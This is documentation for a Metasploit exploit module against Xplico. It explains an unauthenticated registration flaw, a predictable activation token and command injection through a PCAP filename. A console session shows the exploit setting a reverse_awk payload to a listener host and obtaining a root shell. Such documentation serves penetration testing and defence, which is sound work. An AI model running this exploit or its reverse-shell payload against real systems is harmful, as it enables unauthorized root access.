adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
ffe4dbcc19def7a2e5e6140b83b514b1f30ded98
metasploit-gs/documentation/modules/exploit/linux/http/xplico_exec.md
T
Mehmet İnce 54936b6ac3 Updatig documentation and tweaking initiate_session
2017-11-15 01:04:06 +03:00

88 lines
4.6 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module exploits command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal command under the context of the root user.
The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extract from an internet
traffic capture the applications data contained. There is a hidden end-point at inside of the Xplico that allow anyone to create
a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico try
to send e-mail that contains activation code. Unfortunetly, this e-mail probably not gonna reach to the given e-mail address on most of installation.
But it's possible to calculate exactly same token value because of insecure cryptographic random string generator function usage.
One of the feature of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico execute an operating system command in order to calculate checksum
of the file. Name of the for this operation is direclty taken from user input and then used at inside of the command without proper input validation.
**Vulnerable Application Installation Steps**
Follow instruction from "from sourceforge" section at following URL. Don't forget install version 1.2.0 instead of 1.0.0. At the time of this writing, installation commands contains command for version 1.0.0
[http://wiki.xplico.org/doku.php?id=ubuntu](http://wiki.xplico.org/doku.php?id=ubuntu)
You may also give a try to virtualbox image provided by maintainer of Xplico. I've tested this module against Xplico-1.1.0-ubuntu-13.10-i386.ova.
[https://sourceforge.net/projects/xplico/files/VirtualBox%20images/](https://sourceforge.net/projects/xplico/files/VirtualBox%20images/)
Username of the virtualbox image is "ubuntu" and password is "reverse".
## Verification Steps
A successful check of the exploit will look like this:
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/securityonion_xplico_exec`
- [ ] Set `RHOST`
- [ ] Set `PAYLOAD cmd/unix/reverse_awk`
- [ ] Set `LHOST`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `New user successfully registered` in console.
- [ ] **Verify** that you are seeing `User successfully activated` in console.
- [ ] **Verify** that you are seeing `Successfully authenticated` in console.
- [ ] **Verify** that you are seeing `New Case successfully creted` in console.
- [ ] **Verify** that you are seeing `New Sols successfully creted` in console.
- [ ] **Verify** that you are seeing `PCAP successfully uploaded. Pcap parser is going to start on server side` in console.
- [ ] **Verify** that you are getting `We are at PCAP decoding phase. Little bit more patience...` in console.
- [ ] **Verify** that you have your root shell.
## Scenarios
```
msf > use exploit/linux/http/securityonion_xplico_exec
msf exploit(securityonion_xplico_exec) > set RHOST 12.0.0.30
RHOST => 12.0.0.30
msf exploit(securityonion_xplico_exec) >
msf exploit(securityonion_xplico_exec) > exploit
[-] Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf exploit(securityonion_xplico_exec) > set payload cmd/unix/
set payload cmd/unix/generic set payload cmd/unix/reverse_netcat
set payload cmd/unix/reverse_awk
msf exploit(securityonion_xplico_exec) > set payload cmd/unix/reverse_awk
payload => cmd/unix/reverse_awk
msf exploit(securityonion_xplico_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(securityonion_xplico_exec) > exploit
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Initiating new session on server side
[*] Registering a new user
[+] New user successfully registered
[*] Username: mwbvnyowr
[*] Password: gHPkAvCTXFDVcfTwaAmfoJUoMNHNDIDT
[*] Calculating em_key code of the user
[*] Activating user with em_key = 159d4af63472e2a47e3f3c5c11205a5e
[+] User successfully activated
[*] Authenticating with our activated new user
[+] Successfully authenticated
[*] Creating new case
[+] New Case successfully creted. Our pol_id = 36
[*] Creating new xplico session for pcap
[+] New Sols successfully creted. Our sol_id = 54
[*] Uploading malformed PCAP file
[+] PCAP successfully uploaded. Pcap parser is going to start on server side.
[*] Parsing has started. Wait for parser to get the job done...
[+] We are at PCAP decoding phase. Little bit more patience...
[+] We are at PCAP decoding phase. Little bit more patience...
[+] We are at PCAP decoding phase. Little bit more patience...
[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.30:39782) at 2017-11-08 14:44:52 +0300
id
uid=0(root) gid=0(root) groups=0(root)
```
Reference in New Issue View Git Blame Copy Permalink